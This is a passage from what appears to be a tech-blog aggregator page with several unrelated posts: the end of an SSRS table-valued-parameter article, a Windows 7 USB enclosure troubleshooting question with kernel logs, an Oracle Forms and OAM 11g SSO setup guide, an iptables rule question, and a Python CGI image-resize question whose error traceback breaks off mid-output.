‘@customerIds’ parameter (this evaluates to an object array at run time). Finally, we’ll need to edit the properties of the ‘@customerIdInserts’ parameter on the report to mark it as a nullable internal parameter so that users aren’t prompted to provide a value for it when running the report. Limitations And Final Thoughts When I first started looking into the text query approach described above I wondered if there might be an upper limit to the size of the string that can be used to run a report. Obviously, the size of the actual query could increase pretty dramatically if you have a parameter that has a lot of potential values or you need to support several different table-valued parameters in the same query. I tested the example Customer Transaction Summary report with 1000 selected customers without any issue, but your mileage may vary depending on how much data you might need to pass into your query. If you think that the text query hack is a lot of work just to use a table-valued parameter, I agree! I think that it should be a lot easier than this to use a table-valued parameter from within SSRS, but so far I haven’t found a better way. It might be possible to create some custom .NET code that could build the EXEC statement for a given set of parameters automatically, but exploring that will have to wait for another post. For now, unless there’s a really compelling reason or requirement to use table-valued parameters from SSRS reports I would probably stick with the tried and true “join-multi-valued-parameter-to-CSV-and-split-in-the-query” approach for using mutli-valued parameters in a stored procedure.

    Read the article

  • External USB attached drive works in Windows XP but not in Windows 7. How to fix?

    - by irrational John
    Earlier this week I purchased this "N52300 EZQuest Pro" external hard drive enclosure from here. I can connect the enclosure using USB 2.0 and access the files in both NTFS partitions on the MBR partitioned drive when I use either Windows XP (SP3) or Mac OS X 10.6. So it works as expected in XP & Snow Leopard. However, the enclosure does not work in Windows 7 (Home Premium) either 64-bit or 32-bit or in Ubuntu 10.04 (kernel 2.6.32-23-generic). I'm thinking this must be a Windows 7 driver problem because the enclosure works in XP & Snow Leopard. I do know that no special drivers are required to use this enclosure. It is supported using the USB mass storage drivers included with XP and OS X. It should also work fine using the mass storage support in Windows 7, no? FWIW, I have also tried using 32-bit Windows 7 on both my desktop, a Gigabyte GA-965P-DS3 with a Pentium Dual-Core E6500 @ 2.93GHz, and on my early 2008 MacBook. I see the same failure in both cases that I see with 64-bit Windows 7. So it doesn't appear to be specific to one hardware platform. I'm hoping someone out there can help me either get the enclosure to work in Windows 7 or convince me that the enclosure hardware is bad and should be RMAed. At the moment though an RMA seems pointless since this appears to be a (Windows 7) device driver problem. I have tried to track down any updates to the mass storage drivers included with Windows 7 but have so far come up empty. Heck, I can't even figure out how to place a bug report with Microsoft since apparently the grace period for Windows 7 email support is only a few months. I came across a link to some USB troubleshooting steps in another question. I haven't had a chance to look over the suggestions on that site or try them yet. Maybe tomorrow if I have time ... ;-) I'll finish up with some more details about the problem. When I connect the enclosure using USB to Windows 7 at first it appears everything worked. Windows detects the drive and installs a driver for it. Looking in Device Manager there is an entry under the Hard Drives section with the title, Hitachi HDT721010SLA360 USB Device. When you open Windows Disk Management the first time after the enclosure has been attached the drive appears as "Not initialize" and I'm prompted to initialize it. This is bogus. After all, the drive worked fine in XP so I know it has already been initialized, partitioned, and formatted. So of course I never try to initialize it "again". (It's a 1 GB drive and I don't want to lose the data on it). Except for this first time, the drive never shows up in Disk Management again unless I uninstall the Hitachi HDT721010SLA360 USB Device entry under Hard Drives, unplug, and then replug the enclosure. If I do that then the process in the previous paragraph repeats. In Ubuntu the enclosure never shows up at all at the file system level. Below are an excerpt from kern.log and an excerpt from the result of lsusb -v after attaching the enclosure. It appears that Ubuntu at first recongnizes the enclosure and is attempting to attach it, but encounters errors which prevent it from doing so. Unfortunately, I don't know whether any of this info is useful or not. excerpt from kern.log [ 2684.240015] usb 1-2: new high speed USB device using ehci_hcd and address 22 [ 2684.393618] usb 1-2: configuration #1 chosen from 1 choice [ 2684.395399] scsi17 : SCSI emulation for USB Mass Storage devices [ 2684.395570] usb-storage: device found at 22 [ 2684.395572] usb-storage: waiting for device to settle before scanning [ 2689.390412] usb-storage: device scan complete [ 2689.390894] scsi 17:0:0:0: Direct-Access Hitachi HDT721010SLA360 ST6O PQ: 0 ANSI: 4 [ 2689.392237] sd 17:0:0:0: Attached scsi generic sg7 type 0 [ 2689.395269] sd 17:0:0:0: [sde] 1953525168 512-byte logical blocks: (1.00 TB/931 GiB) [ 2689.395632] sd 17:0:0:0: [sde] Write Protect is off [ 2689.395636] sd 17:0:0:0: [sde] Mode Sense: 11 00 00 00 [ 2689.395639] sd 17:0:0:0: [sde] Assuming drive cache: write through [ 2689.412003] sd 17:0:0:0: [sde] Assuming drive cache: write through [ 2689.412009] sde: sde1 sde2 [ 2689.455759] sd 17:0:0:0: [sde] Assuming drive cache: write through [ 2689.455765] sd 17:0:0:0: [sde] Attached SCSI disk [ 2692.620017] usb 1-2: reset high speed USB device using ehci_hcd and address 22 [ 2707.740014] usb 1-2: device descriptor read/64, error -110 [ 2722.970103] usb 1-2: device descriptor read/64, error -110 [ 2723.200027] usb 1-2: reset high speed USB device using ehci_hcd and address 22 [ 2738.320019] usb 1-2: device descriptor read/64, error -110 [ 2753.550024] usb 1-2: device descriptor read/64, error -110 [ 2753.780020] usb 1-2: reset high speed USB device using ehci_hcd and address 22 [ 2758.810147] usb 1-2: device descriptor read/8, error -110 [ 2763.940142] usb 1-2: device descriptor read/8, error -110 [ 2764.170014] usb 1-2: reset high speed USB device using ehci_hcd and address 22 [ 2769.200141] usb 1-2: device descriptor read/8, error -110 [ 2774.330137] usb 1-2: device descriptor read/8, error -110 [ 2774.440069] usb 1-2: USB disconnect, address 22 [ 2774.440503] sd 17:0:0:0: Device offlined - not ready after error recovery [ 2774.590023] usb 1-2: new high speed USB device using ehci_hcd and address 23 [ 2789.710020] usb 1-2: device descriptor read/64, error -110 [ 2804.940020] usb 1-2: device descriptor read/64, error -110 [ 2805.170026] usb 1-2: new high speed USB device using ehci_hcd and address 24 [ 2820.290019] usb 1-2: device descriptor read/64, error -110 [ 2835.520027] usb 1-2: device descriptor read/64, error -110 [ 2835.750018] usb 1-2: new high speed USB device using ehci_hcd and address 25 [ 2840.780085] usb 1-2: device descriptor read/8, error -110 [ 2845.910079] usb 1-2: device descriptor read/8, error -110 [ 2846.140023] usb 1-2: new high speed USB device using ehci_hcd and address 26 [ 2851.170112] usb 1-2: device descriptor read/8, error -110 [ 2856.300077] usb 1-2: device descriptor read/8, error -110 [ 2856.410027] hub 1-0:1.0: unable to enumerate USB device on port 2 [ 2856.730033] usb 3-2: new full speed USB device using uhci_hcd and address 11 [ 2871.850017] usb 3-2: device descriptor read/64, error -110 [ 2887.080014] usb 3-2: device descriptor read/64, error -110 [ 2887.310011] usb 3-2: new full speed USB device using uhci_hcd and address 12 [ 2902.430021] usb 3-2: device descriptor read/64, error -110 [ 2917.660013] usb 3-2: device descriptor read/64, error -110 [ 2917.890016] usb 3-2: new full speed USB device using uhci_hcd and address 13 [ 2922.911623] usb 3-2: device descriptor read/8, error -110 [ 2928.051753] usb 3-2: device descriptor read/8, error -110 [ 2928.280013] usb 3-2: new full speed USB device using uhci_hcd and address 14 [ 2933.301876] usb 3-2: device descriptor read/8, error -110 [ 2938.431993] usb 3-2: device descriptor read/8, error -110 [ 2938.540073] hub 3-0:1.0: unable to enumerate USB device on port 2 excerpt from lsusb -v Bus 001 Device 017: ID 0dc4:0000 Macpower Peripherals, Ltd Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x0dc4 Macpower Peripherals, Ltd idProduct 0x0000 bcdDevice 0.01 iManufacturer 1 EZ QUEST iProduct 2 USB Mass Storage iSerial 3 220417 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 32 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 5 Config0 bmAttributes 0xc0 Self Powered MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 2 bInterfaceClass 8 Mass Storage bInterfaceSubClass 6 SCSI bInterfaceProtocol 80 Bulk (Zip) iInterface 4 Interface0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x01 EP 1 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1 Device Status: 0x0001 Self Powered Update: Results using Firewire to connect. Today I recieved a 1394b 9 pin to 1394a 6 pin cable which allowed me to connect the "EZQuest Pro" via Firewire. Everything works. When I use Firewire I can connect whether I'm using Windows 7 or Ubuntu 10.04. I even tried booting my Gigabyte desktop as an OS X 10.6.3 Hackintosh and it worked there as well. (Though if I recall correctly, it also worked when using USB 2.0 and booting OS X on the desktop. Certainly it works with USB 2.0 and my MacBook.) I believe the firmware on the device is at the latest level available, v1.07. I base this on the excerpt below from the OS X System Profiler which shows Firmware Revision: 0x107. Bottom line: It's nice that the enclosure is actually usable when I connect with Firewire. But I am still searching for an answer as to why it does not work correctly when using USB 2.0 in Windows 7 (and Ubuntu ... but really Windows 7 is my biggest concern). OXFORD IDE Device 1: Manufacturer: EZ QUEST Model: 0x0 GUID: 0x1D202E0220417 Maximum Speed: Up to 800 Mb/sec Connection Speed: Up to 400 Mb/sec Sub-units: OXFORD IDE Device 1 Unit: Unit Software Version: 0x10483 Unit Spec ID: 0x609E Firmware Revision: 0x107 Product Revision Level: ST6O Sub-units: OXFORD IDE Device 1 SBP-LUN: Capacity: 1 TB (1,000,204,886,016 bytes) Removable Media: Yes BSD Name: disk3 Partition Map Type: MBR (Master Boot Record) S.M.A.R.T. status: Not Supported

    Read the article

  • OFM 11g: Implementing OAM SSO with Forms

    - by olaf.heimburger
    There is some confusion about the integration of OFM 11g Forms with Oracle Access Manager 11g (OAM). Some say this does not work, some say it works, but.... Actually, having implemented it many times I belong to the later group. Here is how. Caveat Before you start installing anything, take a step back and consider your current implementation and what you really need and want to achieve. The current integration of Forms 11g with OAM 11g does not support self-service account creation and password resets from the Forms application. If you really need this, you must use the existing Oracle AS 10.1.4.3 infrastructure. On the other hand, if your user population is pretty stable, you can enjoy the latest Forms 11g with OAM 11g. Assumptions The whole process should be done in one day. I assume that all domains and instances are started during setup, if you need to restart them on demand or purpose, be sure to have proper start/stop scripts, I don't mention them. Preparation It goes without saying, that you always should do a proper backup before you change anything on your production environment. With proper backup, I also mean a tested and verified restore process. If you dared to test it before, do it now. It pays off. Requirements For OAM 11g to work properly you need a LDAP repository. For the integration of Forms 11g you need an Oracle Internet Directory (OID) configured with the Oracle AS SSO LDAP extensions. For better support I usually give the latest version a try, in this case OID 11g is a good choice.During the Installation and Integration steps we use an upgrade wizard that needs the old OID configuration on the same host but in a different ORACLE_HOME. Installation vs Configuration With OFM 11g Oracle introduced a clear separation between Installation of the binaries (the software) and the Configuration of the instances (the runtime). This is really great as you can install all the software and create new instances when needed. In the following we adhere to this scheme and install the software first and then configure the instances later. Installation Steps The Oracle documentation contains all the necessary steps for the installation of all pieces of software. But some hints help to avoid traps and pitfalls. Step 1 The Database Start the installation with the database. It is quite obvious but we need an Oracle database for all the other steps. If you have one at hand, fine. If not, just install at least a Oracle 10.2.0.4 version. This database can be on a different host. Step 2 The Repository Creation Utility The next step should be to run the Repository Creation Utility (RCU). This is a client application that just needs to connect to your database. It can be run on any host that can reach the database and is a Windows or Linux 32-bit machine. When you run it, be sure to install the OID schema and the OAM schema. If you miss one of these, you can run the RCU again to install the missing schema. Step 3 The Foundation With OFM 11g Oracle started to use WebLogic Server 11g (WLS) as its foundation for all OFM 11g installation. We therefore install it first. Depending on your operating system, it might be possible, that no native installer is available. My approach to this dilemma is to use the WLS Generic Installer for all my installations. It does not include a JDK either but if you have both for your platform you are ready to go. Step 3a The JDK To make things interesting, Oracle currently has two JDKs in its portfolio. The Sun JDK and the JRockit JDK. Both are available for a number of platforms. If you are lucky and both are available for your platform, install both in a separate directory (and not one of your ORACLE_HOMEs) each, You can use the later as you like. Step 3b Install WLS for OID and OAM With the JDK installed, we start the generic installer with java -jar wls_generic.jar.STOP! Before you do this, check the version first. It should be 1.6.0_18 or later and not the GCC one (Some Linux distros have it installed by default). To verify the version, issue a java -version command and make sure that the output does not contain the text gcj and the version matches. If this does not work, use an absolute path like /opt/java/jdk1.6.0_23/bin/java to start the installer. The installer allows you to specify a path to install the software into, say /opt/oracle/iam/11.1.1.3 for the OID and OAM installation. We will call this IAM_HOME. Step 4 Install OID Now we are ready to install OID. Start the OID installer (in the Disk1 directory) and just select the installation only step. This will install the software only and does not configure the instance. Use the IAM_HOME as the target directory. Step 5 Install SOA Suite The IAM 11g Suite uses the BPEL component of the SOA Suite 11g for its workflows. This is a pretty closed environment and not to be used for SCA Composites. We install the SOA Suite in $IAM_HOME/soa. The installer only installs the binaries. Configuration will be done later. Step 6 Install OAM Once the installation of OID and SOA is done, we are ready to install the OAM software in the same IAM_HOME. Make sure to install the OAM binaries in a directory different from the one you used during the OID and SOA installation. As before, we only install the software, the instance will be created later. Step 7 Backup the Installation At this point, I normally do a backup (or snapshot in a virtual image) of the installation. Good when you need to go back to this point. Step 8 Configure OID The software is installed and now we need instances to run it. This process is called configuration. For OID use the config.sh found in $IAM_HOME/oid/bin to start the configuration wizard. Normally this runs smoothly. If you encounter some issues check the Oracle Support site for help. This configuration will also start the OID instance. Step 9 Install the Oracle AS SSO Schema Before we install the Forms software we need to install the Oracle AS SSO Schema into the database and OID. This is a rather dangerous procedure, but fully documented in the IAM Installation Guide, Chapter 10. You should finish this in one go, do not reboot your host during the whole procedure. As a precaution, you should make a backup of the OID instance before you start the procedure. Once the backup is ready, read the chapter, including every note, carefully. You can avoid a number of issues by following all the steps and will succeed with a working solution. Step 10 Configure OAM Reached this step? Great. You are ready to create an OAM instance. Use the $IAM_HOME/iam/common/binconfig.sh for this. This will open the WLS Domain Creation Wizard and asks for the libraries to be installed. You should at least select the OAM with Database repository item. The configuration will also start the OAM instance. Step 11 Install WLS for Forms 11g It is quite tempting to install everything in one ORACLE_HOME. Unfortunately this does not work for all OFM packages. Therefore we do another WLS installation in another ORACLE_HOME. The same considerations as in step 3b apply. We call this one FORMS_HOME. Step 12 Install Forms In the FORMS_HOME we now install the binaries for the Forms 11g software. Again, this is a install only step. Configuration starts with the next step. Step 13 Configure Forms To configure Forms 11g we start the Configuration Wizard (config.sh) in FORMS_HOME/bin. This wizard should create a new WebLogic Domain and an OHS instance! Do not extend existing domains or instances! Forms should run in its own instances! When all information is supplied, the wizard will create the domain and instance and starts them automatically.Step 14 Setup your Forms SSO EnvironmentOnce you have implemented and tested your Forms 11g instance, you can configured it for SSO. Yes, this requires the old Oracle AS SSO solution, OIDDAS for creating and assigning users and SSO to setup your partner applications. In this step you should consider to create every user necessary for use within the environment. When done, do not forget to test it. Step 15 Migrate the SSO Repository Since the final goal is to get rid of the old SSO implementation we need to migrate the old SSO repository into the new OID structure. Additionally, this step will also migrate all partner application configurations into OAM 11g. Quite convenient. To do this step, you have to start the upgrade agent (ua or ua.bat or ua.cmd) on the operating system level in $IAM_HOME/bin. Once finished, this wizard will create new osso.conf files for each partner application in $IAM_HOME/upgrade/temp/oam/.Note: At the time of this writing, this step only works if everything is on the same host (ie. OID, OAM, etc.). This restriction might be lifted in later releases. Step 16 Change your OHS sso.conf and shut down OC4J_SECURITY In Step 14 we verified that SSO for our Forms environment works fine. Now, we are shutting the old system done and reconfigure the OHS that acts as the Forms entry point. First we go to the OHS configuration directory and rename the old osso.conf  to osso.conf.10g. Now we change the moduleconf/mod_osso.conf  to point to the new osso.conf file. Copy the new osso.conf  file from $IAM_HOME/upgrade/temp/oam/ to the OHS configuration directory. Restart OHS, test forms by using the same forms links. OAM should now kick in and show the login dialog to ask for your user credentials.Done. Now your Forms environment is successfully integrated with OAM 11g.Enjoy. What's Next? This rather lengthy setup is just the foundation for your growing environment of OAM 11g protections. In the next entry we will show that Forms 11g and ADF Faces 11g can use the same OAM installation and provide real single sign-on. References Nearly everything is documented. Use the documentation! Oracle® Fusion Middleware Installation Guide for Oracle Identity Management 11gR1 Oracle® Fusion Middleware Installation Guide for Oracle Identity Management 11gR1, Chapter 11-14 Oracle® Fusion Middleware Administrator's Guide for Oracle Access Manager 11gR1, Appendix B Oracle® Fusion Middleware Upgrade Guide for Oracle Identity Management 11gR1, Chapter 10   

    Read the article

  • if I put accept all 0.0.0.0/0 means this server is totally open for any ip ?

    - by davyzhang
    ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 is this means allow all ip from all port? but I still can not visit the server except I go through the allowed ip address and if I put this line in any line, did I make this server totally open for any connection? the full iptable list is below Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 ACCEPT all -- 116.211.25.89 0.0.0.0/0 ACCEPT all -- 222.215.136.8 0.0.0.0/0 ACCEPT all -- 125.82.87.21 0.0.0.0/0 ACCEPT all -- 127.0.0.1 127.0.0.1 ACCEPT tcp -- 61.172.251.109 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.172.254.123 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.129.44.191 0.0.0.0/0 ACCEPT tcp -- 61.129.44.128 0.0.0.0/0 ACCEPT tcp -- 61.172.251.109 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.172.254.123 0.0.0.0/0 tcp spt:8080 ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 icmp type 0 ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 icmp type 8 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:123 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:123 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:20 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:21 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:80 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:88 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:8000 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:8888 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:873 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:6969 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:6900 ACCEPT tcp -- 61.172.241.98 0.0.0.0/0 ACCEPT tcp -- 61.172.247.98 0.0.0.0/0 ACCEPT tcp -- 61.172.247.100 0.0.0.0/0 ACCEPT tcp -- 61.152.122.33 0.0.0.0/0 ACCEPT tcp -- 61.152.110.130 0.0.0.0/0 ACCEPT tcp -- 210.51.28.220 0.0.0.0/0 ACCEPT tcp -- 210.51.28.120 0.0.0.0/0 ACCEPT tcp -- 61.172.241.120 0.0.0.0/0 ACCEPT tcp -- 211.147.0.85 0.0.0.0/0 ACCEPT tcp -- 211.147.0.114 0.0.0.0/0 ACCEPT tcp -- 222.73.61.249 0.0.0.0/0 ACCEPT tcp -- 222.73.61.250 0.0.0.0/0 ACCEPT tcp -- 222.73.61.251 0.0.0.0/0 ACCEPT tcp -- 210.51.31.11 0.0.0.0/0 tcp dpt:38422 ACCEPT tcp -- 210.51.31.12 0.0.0.0/0 tcp dpt:38422 ACCEPT tcp -- 61.172.254.123 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.172.251.109 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.172.247.85 0.0.0.0/0 ACCEPT tcp -- 222.73.12.248 0.0.0.0/0 ACCEPT tcp -- 61.172.254.184 0.0.0.0/0 ACCEPT tcp -- 61.172.254.78 0.0.0.0/0 ACCEPT tcp -- 61.172.254.243 0.0.0.0/0 ACCEPT tcp -- 61.152.97.115 0.0.0.0/0 ACCEPT tcp -- 221.231.128.206 0.0.0.0/0 ACCEPT tcp -- 221.231.130.199 0.0.0.0/0 ACCEPT udp -- 172.0.0.0/8 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 10.0.0.0/8 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 192.168.0.0/16 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 61.172.252.58 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 61.183.13.201 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.2.11 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 221.208.157.158 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 218.30.74.250 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 202.102.54.234 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 125.64.2.115 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.23.23 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 210.51.33.97 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 210.51.33.98 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.11.112 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.11.111 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.11.89 0.0.0.0/0 udp spt:38514 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:38423 REJECT tcp -- 0.0.0.0/0 0.0.0.0/0 reject-with tcp-reset DROP all -- 0.0.0.0/0 0.0.0.0/0 Chain FORWARD (policy ACCEPT) target prot opt source destination DROP all -- 0.0.0.0/0 0.0.0.0/0 Chain OUTPUT (policy ACCEPT) target prot opt source destination ACCEPT udp -- 0.0.0.0/0 222.73.11.89 udp dpt:38514

    Read the article

  • http request to cgi python script successful, but the script doesn't seem to run

    - by chipChocolate.py
    I have configured cgi scripts for my apache2 web server. Here is what I want to do: Client uploads the image to the server. (this already works) On success, I want to execute the python script to resize the image. I tried the following and the success function does execute but my python script does not seem to execute: Javascript code that sends the request: var input = document.getElementById('imageLoader'); imageName = input.value; var file = input.files[0]; if(file != undefined){ formData= new FormData(); console.log(formData.length); if(!!file.type.match(/image.*/)){ formData.append("image", file); $.ajax({ url: "upload.php", type: "POST", processData: false, contentType: false, success: function() { var input = document.getElementById('imageLoader'); imageName = input.value; var file = input.files[0]; formData = new FormData(); formData.append("filename", file); $.ajax({ url: "http://localhost/Main/cgi-bin/resize.py", type: "POST", data: formData, processData: false, contentType: false, success: function(data) { console.log(data); } }); // code continues... resize.py: #!/usr/bin/python import cgi import cgitb import Image cgitb.enable() data = cgi.FieldStorage() filename = data.getvalue("filename") im = Image.open("../JS/upload/" + filename) (width, height) = im.size maxWidth = 600 maxHeight = 400 if width > maxWidth: d = float(width) / maxWidth height = int(height / d) width = maxWidth if height > maxHeight: d = float(height) / maxHeight width = int(width / d) height = maxHeight size = (width, height) im = im.resize(size, Image.ANTIALIAS) im.save("../JS/upload/" + filename, quality=100) This is the apache2.conf: <Directory /var/www/html/Main/cgi-bin> AllowOverride None Options +ExecCGI SetHandler cgi-script AddHandler cgi-script .py .cgi Order allow,deny Allow from all </Directory> cgi-bin and python script file permissions: drwxrwxr-x 2 mou mou 4096 Aug 24 03:28 cgi-bin -rwxrwxrwx 1 mou mou 1673 Aug 24 03:28 resize.py Edit: Executing this code $.ajax({ url: "http://localhost/Main/cgi-bin/resize.py", type: "POST", data: formData, // formData = {"filename" : "the filename which was saved in a variable whie the image was uploaded"} processData: false, contentType: false, success: function(data) { alert(data); } }); it alerts the following: <body bgcolor="#f0f0f8"><font color="#f0f0f8" size="-5"> --> <body bgcolor="#f0f0f8"><font color="#f0f0f8" size="-5"> --> --> </font> </font> </font> </script> </object> </blockquote> </pre> </table> </table> </table> </table> </table> </font> </font> </font><body bgcolor="#f0f0f8"> <table width="100%" cellspacing=0 cellpadding=2 border=0 summary="heading"> <tr bgcolor="#6622aa"> <td valign=bottom>&nbsp;<br> <font color="#ffffff" face="helvetica, arial">&nbsp;<br><big><big><strong>&lt;type 'exceptions.TypeError'&gt;</strong></big></big></font></td ><td align=right valign=bottom ><font color="#ffffff" face="helvetica, arial">Python 2.7.6: /usr/bin/python<br>Sun Aug 24 17:24:15 2014</font></td></tr></table> <p>A problem occurred in a Python script. Here is the sequence of function calls leading up to the error, in the order they occurred.</p> <table width="100%" cellspacing=0 cellpadding=0 border=0> <tr><td bgcolor="#d8bbff"><big>&nbsp;</big><a href="file:///var/www/html/Main/cgi-bin/resize.py">/var/www/html/Main/cgi-bin/resize.py</a> in <strong><module></strong>()</td></tr> <tr><td><font color="#909090"><tt>&nbsp;&nbsp;<small>&nbsp;&nbsp;&nbsp;10</small>&nbsp;<br> </tt></font></td></tr> <tr><td><font color="#909090"><tt>&nbsp;&nbsp;<small>&nbsp;&nbsp;&nbsp;11</small>&nbsp;filename&nbsp;=&nbsp;data.getvalue("filename")<br> </tt></font></td></tr> <tr><td bgcolor="#ffccee"><tt>=&gt;<small>&nbsp;&nbsp;&nbsp;12</small>&nbsp;im&nbsp;=&nbsp;Image.open("../JS/upload/"&nbsp;+&nbsp;filename)<br> </tt></td></tr> <tr><td><font color="#909090"><tt>&nbsp;&nbsp;<small>&nbsp;&nbsp;&nbsp;13</small>&nbsp;<br> </tt></font></td></tr> <tr><td><font color="#909090"><tt>&nbsp;&nbsp;<small>&nbsp;&nbsp;&nbsp;14</small>&nbsp;(width,&nbsp;height)&nbsp;=&nbsp;im.size<br> </tt></font></td></tr> <tr><td><small><font color="#909090">im <em>undefined</em>, <strong>Image</strong>&nbsp;= &lt;module 'Image' from '/usr/lib/python2.7/dist-packages/PILcompat/Image.pyc'&gt;, Image.<strong>open</strong>&nbsp;= &lt;function open&gt;, <strong>filename</strong>&nbsp;= '<font color="#c040c0">\xff\xd8\xff\xe0\x00\x10</font>JFIF<font color="#c040c0">\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00</font>C<font color="#c040c0">\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\n\x10\n\n\t\t\n\x14\x0e</font>...<font color="#c040c0">\x94\r\x17\x11</font>b<font color="#c040c0">\xcd\xdc\x1a\xfe\xf1\x05\x1b\x15\xd1</font>R<font color="#c040c0">\xce\xe9</font>*<font color="#c040c0">\xb5\x8e</font>b<font color="#c040c0">\x97\x82\x87</font>R<font color="#c040c0">\xf4\xaa</font>K<font color="#c040c0">\x83</font>6<font color="#c040c0">\xbf\xfb</font>0<font color="#c040c0">\xa0\xb6</font>8<font color="#c040c0">\xa9</font>C<font color="#c040c0">\x86\x8d\x96</font>n+E<font color="#c040c0">\xd3\x7f\x99\xff\xd9</font>'</font></small></td></tr></table> <table width="100%" cellspacing=0 cellpadding=0 border=0> <tr><td bgcolor="#d8bbff"><big>&nbsp;</big><a href="file:///usr/lib/python2.7/dist-packages/PIL/Image.py">/usr/lib/python2.7/dist-packages/PIL/Image.py</a> in <strong>open</strong>(fp='../JS/upload/<font color="#c040c0">\xff\xd8\xff\xe0\x00\x10</font>JFIF<font color="#c040c0">\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00</font>C<font color="#c040c0">\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06</font>...<font color="#c040c0">\x94\r\x17\x11</font>b<font color="#c040c0">\xcd\xdc\x1a\xfe\xf1\x05\x1b\x15\xd1</font>R<font color="#c040c0">\xce\xe9</font>*<font color="#c040c0">\xb5\x8e</font>b<font color="#c040c0">\x97\x82\x87</font>R<font color="#c040c0">\xf4\xaa</font>K<font color="#c040c0">\x83</font>6<font color="#c040c0">\xbf\xfb</font>0<font color="#c040c0">\xa0\xb6</font>8<font color="#c040c0">\xa9</font>C<font color="#c040c0">\x86\x8d\x96</font>n+E<font color="#c040c0">\xd3\x7f\x99\xff\xd9</font>', mode='r')</td></tr> <tr><td><font color="#909090"><tt>&nbsp;&nbsp;<small>&nbsp;1994</small>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;isPath(fp):<br> </tt></font></td></tr> <tr><td><font color="#909090"><tt>&nbsp;&nbsp;<small>&nbsp;1995</small>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;filename&nbsp;=&nbsp;fp<br> </tt></font></td></tr> <tr><td bgcolor="#ffccee"><tt>=&gt;<small>&nbsp;1996</small>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fp&nbsp;=&nbsp;builtins.open(fp,&nbsp;"rb")<br> </tt></td></tr> <tr><td><font color="#909090"><tt>&nbsp;&nbsp;<small>&nbsp;1997</small>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else:<br> </tt></font></td></tr> <tr><td><font color="#909090"><tt>&nbsp;&nbsp;<small>&nbsp;1998</small>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;filename&nbsp;=&nbsp;""<br> </tt></font></td></tr> <tr><td><small><font color="#909090"><strong>fp</strong>&nbsp;= '../JS/upload/<font color="#c040c0">\xff\xd8\xff\xe0\x00\x10</font>JFIF<font color="#c040c0">\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00</font>C<font color="#c040c0">\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06</font>...<font color="#c040c0">\x94\r\x17\x11</font>b<font 